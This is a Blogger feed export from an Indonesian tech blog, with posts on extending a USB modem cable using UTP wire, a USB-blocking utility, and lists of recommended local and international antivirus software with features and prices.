tag:blogger.com,1999:blog-39001505141825051802024-03-14T01:55:20.375-07:00Rofiq FauziBreath to HealthRofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-3900150514182505180.post-18871082682403465292011-04-01T12:05:00.000-07:002011-04-01T12:05:30.974-07:00Menstabilkan Sinyal Pada Modem<div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">Pada saat ini hampir semua operator telepon selular di negeri ini menyediakan layanan internet, kita tinggal memilih operator mana yang kita mau.. .<br />
Postingan kali ini tidak akan membahas pilih- memilih <em>ISP(Internet Service Provider)</em>, tetapi bagaimana cara atau trik meningkatkan / menstabilkan sinyal 2G atau 3G sehingga akses internet kita lebih stabil.</span></div><div> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">Tadinya saya selalu dibuat jengkel karena sinyal HSDPA dari operator yang saya pakai selalu timbul tengelam dan bahkan menghilang..mungkin karena jauh dari BTSnya.sehingga internet sering lambat atau sering putus.<br />
Saat ini masalah itu sudah tidak terjadi lagi karena sinyal HSDPAnya selalu <strong>full bar</strong>.. walaupun saya berada di ruangan yang tertutup tembok atau di ruangan yang biasanya tidak mendapat sinyal ..</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">Yang saya lakukan adalah menempatkan modem jauh di atas, di daerah yang lebih terbuka yaitu di luar rumah, di atap lantai dua.. menjadikan sinyal yang tertangkap kuat dan stabil, tidak timbul tenggelam lagi.<br />
Cara yang digunakan adalah <strong>memperpanjang kabel USB modemnya</strong>.. hingga 12(dua belas)meter (standarnya 1 atau 1,5 meter), ini memang melawan teori yang katanya kabel USB itu maksimal panjangnya sekitar 5 meter. tapi kenyataannya panjangnya ditambah ..BISA. Mungkin ini akan tergantung dari jenis kabel yang digunakan, merk/jenis modem, dan kekuatan power port usb komputernya.</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">Modem yang saya gunakan adalah Huawei E270.. bahkan sebelumnya ketika menggunakan modem huawei EC325 (CDMA) panjang kabelnya mencapai 15 meteran, dan ketika kabel tersebut digunakan untuk modem huawey E270, modemnya tidak terdeteksi kemudian panjang kabelnya dikurangi dan dikurangi sehingga pada kisaran panjang 12 meter modem E270 berfungsi dengan baik.</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">Bagaimana cara menyambungnya?, jenis kabel apa yang digunakan?</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">1. Siapkan kabel USB standar (kabel USB ke modem) yang berkualitas baik.<br />
2. Siapkan kabel UTP (Unshielded twisted pair, adalah kabel standar untuk koneksi jaringan komputer LAN), cat 5 atau cat 6 lebih baik, panjang disesuaikan misal 12 meter dulu (12 m belum tentu cocok dengan modem anda, nantinya panjangnya mungkin harus dikurangi)<br />
3. Peralatan untuk penyambungan : Solder, timah, isolasi, gunting / tang pemotong</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">Cara pengerjaan</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">1. Potong (bagi dua) kabel USB modem, kemudian kupas masing- masing ujungnya.<br />
Kabel USB di dalamnya memiliki 4 kabel ditambah 1 ground (kabel ground nantinya tidak digunakan, karena keterbatasan jumlah isi kabel UTP)</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">2. Siapkan kabel UTP, kupas kedua ujungnya. kabel UTP memiliki isi 8 kabel di dalamnya. Karena kabel USB berisi 4 kabel, maka kita hanya memerlukan 4 isi kabel UTP, tetapi supaya dapat menambah daya hantar (mengurangi resistansi) setiap dua kabel digandengkan / disatukan, jadi seolah-olah kabel UTP ini berisi 4 kabel.</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">3. Sambungkan kabel USB dengan kabel UTP , perhatikan warna kabel agar jangan sampai tertukar, solderlah setiap sambungan kemudian beri isolasi.<br />
<em>“Memilih dan menentukan warna kabel UTP bebas, yang penting warna kabel USB di ujung yang satu harus bertemu kembali dengan warna yang sama di ujung yang lain, kabel USB warna merah harus bertemu kembali dengan kabel berwarna merah , hitam harus bertemu hitam dan seterusnya .. tidak boleh tertukar .. kalau tidak, bisa bisa modem atau port USBnya malah rusak..”</em></span> </div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">4. Agar sambungan antar kabel kuat dan koneksinya bagus, solderlah dengan baik kemudian beri isolasi untuk mencegah konsleting. </span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">5. Periksalah sekali lagi, kalau sudah yakin sambungannya benar, baru bisa dicoba, kalau belum yakin jangan dicoba-coba. karena kalau sambungan tidak benar dapat menyebabkan komputer(port USB) atau modemnya rusak. kalau masih belum mengerti coba tanyakan atau minta bantuan ke teman yang mengerti tentang elektronik.</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">6. kalau sudah benar-benar yakin, silakan coba , nyalakan komputer dan sambungkan modemnya, kalau modem sudah terdeteksi oleh komputer berarti tinggal menempatkan modem di area yang paling bagus untuk menerima sinyal.<br />
Bila belum terdeteksi atau USB malfunction, berarti kabelnya harus dibuat lebih pendek lagi..</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">6. Setelah modem terbukti berfungsi, kemudian tempatkan modem di daerah yang sekiranya sinyal dari operatornya paling kuat.</span></div><div style="text-align: justify;"> </div><div style="font-family: Arial,Helvetica,sans-serif; text-align: justify;"><span style="font-size: small;">Yang harus diperhatikan :<br />
Hati-hati terhadap bahaya petir, kalau sudah cuaca mendung dan kita tidak yakin dengan penangkal petir gedung / rumah kita.. lebih baik turunkan saja<br />
Tempatkan di area yang tidak mendapat sinar matahari langsung.<br />
Hati-hati juga terhadap hujan.. kalau kena air hujan ya berakhirlah… </span></div>Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-34013780703245103632011-03-22T00:49:00.000-07:002011-03-22T00:50:20.526-07:00Tips dan Triks BerkomputerMau lebih banyak dan detail tentang Tips and Tricks Komputer, kunjungi saja dengan meng <a href="http://www.tipstrikkomputer.com/">klik disini</a>Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-45046370931889035232011-03-22T00:38:00.000-07:002011-03-22T00:41:12.944-07:00Trik Komputer – Blok Usb Dengan Usb Block<a href="http://www.tipstrikkomputer.com/trik-komputer-blok-usb-dengan-usb-block.html/images-11" rel="attachment wp-att-1175" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="Tips Dan Trik komputer, terlengkap, terbaru, teruptodate 2011, Free download USB Block " class="alignleft size-full wp-image-1175" height="80" src="http://www.tipstrikkomputer.com/wp-content/uploads/2011/02/images.jpg" title="Free download USB Block " width="130" /></a>Rekan – rekan ga suka teman-teman main colok usb di komputer atau laptop rekan-rekan tanpa izin.? Mungkin ada baiknya rekan-rekan mencoba aplikasi yang satu ini.<br />
Aplikasi ini adalah USB BLOCK, fungsi aplikasi ini adalah memblok USB ( flashdisk, dll ), Disk, Netword yang tersambung dengan komputer kita tanpa mendapatkan konfirmasi dari pemilik komputer.<br />
Jadi setiap ada yang mencolokkan flashdik atau hardisk external, komputer atau laptop akan meminta password yang telah kita tentukan. Tapi jangan khawatir,<span id="more-1172"></span> apliksi ini juga memiliki fasilitas untuk mengenali gadget yang sering kita hubungkan, jadi jika kita sudah mengizinkan gadget tersebut tersambung dengan komputer kita, maka aplikasi tidak akan minta password lagi.<br />
Selamat mencoba..,.,Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-83972421895892774952011-03-21T20:43:00.000-07:002011-03-21T20:43:19.989-07:00Daftar Antivirus Indonesia Terbaik 2011<h3 class="post-title entry-title"> <a href="http://batamsoft.blogspot.com/2011/01/daftar-antivirus-lokal-terbaik-2011.html"></a> </h3><div class="post-header-line-1"> <div class="postmeta"> <span class="post-author vcard"> </span> </div></div><div style="float: left; margin-right: 10px;"> </div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><img alt="" class="alignleft" height="100" src="http://abuaufa.com/wp-content/images/freeantivirus.jpg" style="float: left; margin: 2px 8px;" title="Antivirus Lokal Terbaik" width="90" />Setelah sebelumnya kita membahas <strong><a href="http://abuaufa.com/7-antivirus-gratis-terbaik/" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;" title="Antivirus Gratis Terbaik">antivirus gratis terbaik</a></strong> dari Luar, kini saatnya kita membahas antivirus lokal buatan anak negeri. Sebagaimana kita ketahui bahwa di Luar sana terdapat banyak antivirus gratis yang bagus, sebut saja Avira, <a href="http://abuaufa.com/avast-5-0-free-antivirus/" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;">Avast</a>, AVG,<a href="http://abuaufa.com/panda-antivirus-pro-2010-lisensi-gratis-3-bulan/" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;" title="Panda Antivirus">Panda Antivirus</a> dan sebagainya. Akan tetapi seringkali antivirus tersebut tidak mengenali/mendeteksi virus-virus kreasi anak negeri. Oleh karena itu dibutuhkan<strong><a href="http://abuaufa.com/download-antivirus-lokal-terbaik/" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;" title="Antivirus Lokal Terbaik">antivirus lokal terbaik</a></strong> yang ampuh untuk membasmi virus lokal yang membandel.<span id="more-661"></span></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;">Berikut adalah beberapa <em>antivirus lokal terbaik</em> yang bisa anda coba.</div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><a href="http://abuaufa.com/wp-content/images/scr-smadav-2009.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" class="alignnone" height="141" src="http://abuaufa.com/wp-content/images/scr-smadav-2009.jpg" style="margin-top: 1em;" title="SMADAV antivirus lokal" width="200" /></a><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong>1. <a href="http://abuaufa.com/smadav-2010-rev-8-0-dirilis/" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;">SMADAV</a></strong><br />
Siapa yang tak kenal dengan antivirus satu ini, dengan kemampuannya merecovery file yang terkena virus dan teknology smart behaviour SMADAV tidak berlebihan diklaim sebagai antivirus lokal terbaik untuk saat ini.</div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;"></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;">Download : <a href="http://abuaufa.com/goto/http://smadav.net/download" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;" target="_blank"><strong>SMADAV Antivirus</strong></a></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong></strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong></strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><a href="http://abuaufa.com/wp-content/images/pcmedia.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" class="alignnone" height="140" src="http://abuaufa.com/wp-content/images/pcmedia.jpg" style="margin-top: 1em;" title="PCMAV Antivirus Lokal" width="200" /></a><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong>2. PCMAV</strong><br />
Antivirus yang dibundle dengan Majalah PCMedia ini bisa dikatakan antivirus yang lengkap, selain dibekali dengan database virus yang update, kemampuannya digabung dengan CLAMAV menjadi nilai tambah yang sangat bagus.</div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;"></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;">Download : <strong><a href="http://abuaufa.com/goto/http://pcmav.biz/download" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;" target="_blank">PCMAV</a></strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong> </strong><a href="http://abuaufa.com/wp-content/images/ansav.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" class="alignnone" height="158" src="http://abuaufa.com/wp-content/images/ansav.jpg" style="margin-top: 1em;" title="ANSAV Antivirus Lokal" width="200" /></a><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong>3. ANSAV</strong><br />
Antivirus buatan komunitas anak-anak yogya ini tidak bisa dipandang sebelah mata, dengan tampilannya yang simple, ANSAV mempunyai kemampuan yang setara dengan SMADAV maupun PCMAV. Antivirus ini dilengkapi dengan plugin dan multi bahasa.</div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;"></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;">Download : <strong><a href="http://abuaufa.com/goto/http://www.ansav.com/" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;" target="_blank">ANSAV Antivirus</a></strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><a href="http://abuaufa.com/wp-content/images/avigen_ultimate.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" class="alignnone" height="165" src="http://abuaufa.com/wp-content/images/avigen_ultimate.gif" style="margin-top: 1em;" title="AVIGEN Antivirus Lokal" width="200" /></a><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong> </strong></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px; text-align: justify;"><strong>4. AVIGEN</strong><br />
Antivirus satu ini memang jarang terdengar ditelinga kita, antivirus yang digunakan untuk mencari file-file yang berisi worm, hacktool, exploit script ataupun trojan ini bersifat open source sehingga disamping kita bisa mendownload antivirusnya, kita juga bisa memperoleh source codenya.</div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;"></div><div style="color: #292929; font-family: Tahoma,Arial,Helvetica,sans-serif; font-size: 13px; margin: 0.5em 10px 0.5em 0px;">Download : <strong><a href="http://abuaufa.com/goto/http://www.vb-bego.com/root/products/avigen/" style="color: #009900; font-family: Tahoma,Arial,Helvetica,sans-serif; text-decoration: underline;" target="_blank">AVIGEN Antivirus</a></strong></div>Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-86113216547729381602011-03-21T20:37:00.000-07:002011-03-22T00:28:21.285-07:00Antivirus terbaik DuniaTahun 2011<a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-full wp-image-162" height="194" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/antivirus.jpg" title="antivirus" width="200" /></a><b>INFO-<a href="http://www.info-komputer.tk/category/komputer/" title="KOMPUTER">KOMPUTER</a>.tk</b> – <a href="http://www.info-komputer.tk/category/antivirus/" title="Antivirus">Antivirus</a> adalah penangkal virus atau vaksin dari virus jahat yang hendak merusak komputer <a href="http://www.info-komputer.tk/" title="kita">kita</a>, maka dari itu bagi anda yang masih menggunakan Operating System (OS) Microsoft Windows maka diwajibkan untuk memakai antivirus, agar komputer anda tidak mengalami gangguan dari serangan virus komputer jahat.<br />
Di dunia ini ada banyak macam antivirus mulai dari buatan dalam negeri Indonesia maupun buatan luar negeri, mulai dari yang gratis sampai yang berbayar semuanya ada, dan bebas terserah anda mau memilih yang mana. Tetapi <a href="http://info-komputer.tk/" target="_blank">saya</a> menganjurkan untuk memakai dua antivirus sekaligus dalam satu komputer, yakni antivirus buatan dalam negeri dan yang satunya lagi antivirus buatan dalam negeri.<br />
Disini <a href="http://info-komputer.tk/" target="_blank">saya</a> akan memaparkan <a href="http://info-komputer.tk/10-peringkat-antivirus-terbaik-di-dunia-2011" target="_blank"><b>10 Ranking Antivirus terbaik di dunia</b></a> yang akan menjadi persaingan ketat pada <b>tahun 2011</b>, mengingat kualitas dari masing-masing antivirus semakin berkembang dan maju, dengan mengambil sumber dari <a href="http://anti-virus-software-review.toptenreviews.com/v2/index.html" target="_blank">toptenreviews.com</a>.<br />
<br />
<b>1. Bitdefender Antivirus</b> <br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/bitdefender-antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-full wp-image-163" height="200" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/bitdefender-antivirus.jpg" title="bitdefender antivirus" width="193" /></a><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/file sharing, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, full web protection, auto usb detect.<br />
<b>c) Protection Technology: </b>Virus signatures, whitelisting, heuristic, real time.<br />
<b>d) Supported OS: </b>XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 29.95<br />
>> <a href="http://www.bitdefender.com/site/Downloads/" target="_blank">Download Bitdefender Antivirus</a><br />
<br />
<b>2. Kaspersky Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/kaspersky-antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-medium wp-image-168" height="200" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/kaspersky-antivirus-212x300.jpg" title="kaspersky antivirus" width="163" /></a><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/file sharing, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, full web protection, auto usb detect.<br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, heuristic, real time, <a href="http://www.info-komputer.tk/category/news/security/" title="security">security</a> network.<br />
<b>d) Supported OS: </b>XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 59.95<br />
>> <a href="http://www.kaspersky.com/downloads" target="_blank">Download Kaspersky Antivirus</a><br />
<br />
<b>3. Webroot Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/webroot-antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-full wp-image-174" height="200" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/webroot-antivirus.jpg" title="webroot antivirus" width="165" /></a><b></b><b> </b><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/file sharing, registry startup protection, dialers, hackers, identity theft protection, adware, activex, cookies, scripts, spam.<br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.<br />
<b>d) Supported OS: </b>XP (32 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 29.95<br />
>> <a href="http://www.webroot.com/En_US/consumer-products.html" target="_blank">Download Webroot Antivirus</a><br />
<br />
<b>4. Norton Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/Norton-Antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-medium wp-image-166" height="200" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/Norton-Antivirus-216x300.jpg" title="Norton Antivirus" width="154" /></a><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, inbound email protection, outbond email protection, instant messaging protection, registry startup protection, dialers, backdoors, hackers, identity theft protection, adware, activex, vulnerabilities, scripts, full web protection, auto usb detect.<br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.<br />
<b>d) Supported OS: </b>XP (32 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 39.99<br />
>> <a href="http://norton.com/" target="_blank">Download Norton Antivirus</a><br />
<br />
<b>5. ESET Nod32 Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/eset-Nod32-antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-medium wp-image-167" height="200" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/eset-Nod32-antivirus-213x300.jpg" title="eset Nod32 antivirus" width="158" /></a><b></b><b> </b><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Keyloggers, inbound email protection, outbond email protection, registry startup protection, dialers, backdoors, adware, activex, vulnerabilities, scripts, full web protection, auto usb detect.<br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.<br />
<b>d) Supported OS: </b>XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 39.99<br />
>> <a href="http://www.eset.com/download" target="_blank">Download ESET NOD32 Antivirus </a><b> </b><br />
<br />
<b><br />
</b><br />
<b> </b><b>6. AVG Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/AVG-Antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-medium wp-image-169" height="239" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/AVG-Antivirus-207x300.jpg" title="AVG Antivirus" width="193" /></a><b></b><b> </b><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, p2p/ file sharing protection, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, full web protection, spam, auto usb detect.<br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.<br />
<b>d) Supported OS: </b>XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 34.99<br />
>> <a href="http://www.avg.com/ww-en/download-trial" target="_blank">Download AVG Antivirus</a><br />
<b>7. G Data Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/gdata-antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-medium wp-image-170" height="243" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/gdata-antivirus-219x300.jpg" title="gdata antivirus" width="195" /></a><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, inbound email protection, outbond email protection, instant messaging protection, registry startup protection, dialers, backdoors, hackers, phising, identity theft protection, adware, scripts, full web protection,<a href="http://www.blogger.com/post-edit.g?blogID=3900150514182505180&postID=8611321654772938160">.</a><br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, heuristic, security network.<br />
<b>d) Supported OS: </b>XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 29.95<br />
>> <a href="http://www.gdatasoftware.com/" target="_blank">Download G Data Antivirus</a><b> </b><br />
<br />
<b>8. Avira Antivir</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/antivir-antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-full wp-image-171" height="238" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/antivir-antivirus.jpg" title="antivir antivirus" width="198" /></a><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, inbound email protection, outbond email protection, registry startup protection, dialers, backdoors, phising, adware, activex, scripts, full web protection.<br />
<b>c) Protection Technology: </b>Virus signatures, heuristic, real time, security network.<br />
<b>d) Supported OS: </b>XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 26.95<br />
>> <a href="http://www.avira.com/en/avira-free-antivirus" target="_blank">Download Avira Antivir</a><br />
<br />
<b></b><br />
<b>9. Vipre Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/VIPRE-Antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-medium wp-image-172" height="228" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/VIPRE-Antivirus-225x300.jpg" title="VIPRE Antivirus" width="192" /></a><b></b><b> </b><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b>Browser exploit, OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protectionp2p/file sharing, registry startup protection, dialers, backdoors, hackers, phising, adware, activex, vulnerabilities, cookies, scripts, auto usb detect.<br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, heuristic, real time, security network.<br />
